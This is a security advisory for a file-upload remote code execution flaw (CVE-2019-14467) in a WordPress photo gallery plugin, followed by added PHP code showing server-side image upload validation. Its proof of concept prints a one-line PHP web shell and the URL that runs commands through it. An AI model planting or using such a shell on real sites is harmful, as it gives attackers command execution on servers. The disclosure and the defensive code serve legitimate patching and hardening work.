| Title | Published | Views | Reporter |
|---|---|---|---|
| WordPress Social Photo Gallery 1.0 Remote Code Execution Vulnerability | 17 Nov 2019 00:00 | – | zdt |
| CVE-2019-14467 | 23 Feb 2024 15:11 | – | circl |
| WordPress Social Photo Gallery Remote Code Execution Vulnerability | 18 Nov 2019 00:00 | – | cnvd |
| WordPress Social Photo Gallery Plugin Remote Code Execution (CVE-2019-14467) | 18 Nov 2020 00:00 | – | checkpoint_advisories |
| CVE-2019-14467 | 18 Nov 2019 15:21 | – | cve |
| CVE-2019-14467 | 18 Nov 2019 15:21 | – | cvelist |
| EUVD-2019-5653 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2019-14467 | 18 Nov 2019 16:15 | – | nvd |
| CVE-2019-14467 | 18 Nov 2019 16:15 | – | osv |
| WordPress Social Photo Gallery plugin <= 1.0 - Remote Code Execution (RCE) vulnerability | 15 Nov 2019 00:00 | – | patchstack |
=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised: November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7.5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================
I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution
II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images
deserve to be experienced and shared, to spark a response as they travel
the social web, and to work for you by generating more fans and more Likes
for your content.
III. DESCRIPTION
-------------------------
WordPress Plugin Social Photo Gallery 1.0 is affected by a Remote Code
Execution vulnerability.
The application does not check the file extension when an image is uploaded
to an album, so an uploaded PHP file is stored under the web root and is
executed when it is requested.
To exploit the vulnerability, an attacker only needs to create an album in
the application and attach a malicious PHP file as the album cover photo.
IV. PROOF OF CONCEPT
-------------------------
1. Create a .php file (cmd.php):
<?php system($_GET['cmd']); ?>
2. Click Add Album, select the name, for example "demo" and in the "Cover
Photo" select the cmd.php file.
3. Request the following URL:
http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls
V. BUSINESS IMPACT
-------------------------
These attacks result in the execution of arbitrary commands on the server.
VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0
VII. SOLUTION
-------------------------
The solution is to only allow the upload of digital image files: TIFF, JPEG, GIF, PNG.
VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: [email protected]
X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability discovered by Prestigia Seguridad
July 31, 2019 2: Email sent to vendor, no response
August 15, 2019 3: Second email sent to vendor, no response
November 13, 2019 4: Sent to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/
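The advisory's Solution section says only TIFF, JPEG, GIF and PNG files should be accepted as album covers. The following PHP is an added example of how such server-side validation looks; it is not the plugin's code and not from the advisory. It assumes a hypothetical upload handler that receives one `$_FILES` entry (field name `cover_photo` is assumed) and an album name from the request, and it checks the extension against an allowlist, confirms the detected MIME type matches that extension, confirms the bytes decode as an image, and replaces the client-supplied file name with a generated one.

```php
<?php
// Added example (not the plugin's code): server-side validation of an album
// cover upload so that only genuine TIFF/JPEG/GIF/PNG files reach the
// web-accessible uploads directory.

declare(strict_types=1);

// Allowed extensions mapped to the MIME types each may legitimately carry.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
    'tif'  => ['image/tiff'],
    'tiff' => ['image/tiff'],
];

/**
 * Validate one $_FILES entry and return a safe destination file name,
 * or throw if the file is not an acceptable image.
 *
 * @param array $file one entry of $_FILES (keys: name, tmp_name, error, size)
 */
function validate_image_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or no file supplied');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // 1. Extension check on the client-supplied name. pathinfo() returns the
    //    LAST extension, so "cover.php.jpg" is judged by ".jpg"; the generated
    //    name below then drops the original name entirely.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        throw new RuntimeException("Extension '$ext' is not an allowed image type");
    }

    // 2. Content check: the MIME type detected from the file bytes must match
    //    the extension. A PHP script renamed to .png is rejected here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_IMAGE_TYPES[$ext], true)) {
        throw new RuntimeException("Content type '$mime' does not match extension '$ext'");
    }

    // 3. The file must actually decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File is not a decodable image');
    }

    // 4. Never reuse the client-supplied name: generate one that keeps only the
    //    validated extension (no path separators, no double extensions).
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/**
 * Move a validated upload into the album directory. The album name is
 * reduced to a safe character set so it cannot escape the uploads tree.
 */
function store_album_cover(array $file, string $uploadsDir, string $album): string
{
    $safeName  = validate_image_upload($file);
    $safeAlbum = (string) preg_replace('/[^A-Za-z0-9_-]/', '', $album);
    if ($safeAlbum === '') {
        throw new RuntimeException('Invalid album name');
    }
    $dir = rtrim($uploadsDir, '/') . '/' . $safeAlbum;
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {
        throw new RuntimeException('Cannot create album directory');
    }
    $dest = $dir . '/' . $safeName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Failed to store upload');
    }
    return $dest;
}

// Usage from the (hypothetical) upload handler; field and directory names are assumed.
// $path = store_album_cover(
//     $_FILES['cover_photo'],
//     WP_CONTENT_DIR . '/uploads/socialphotogallery',
//     (string) ($_POST['album'] ?? '')
// );
```

Inside a real WordPress plugin the same extension/MIME agreement check is available through `wp_check_filetype_and_ext()` and `wp_handle_upload()`, which also honour the site's configured upload MIME allowlist. As defence in depth independent of the plugin, the uploads directory should not be allowed to execute scripts at all (for Apache, an `.htaccess` in the uploads tree that disables the PHP handler; for nginx, a location rule that never passes files under `uploads/` to PHP-FPM), so that a validation bypass yields a stored file rather than code execution.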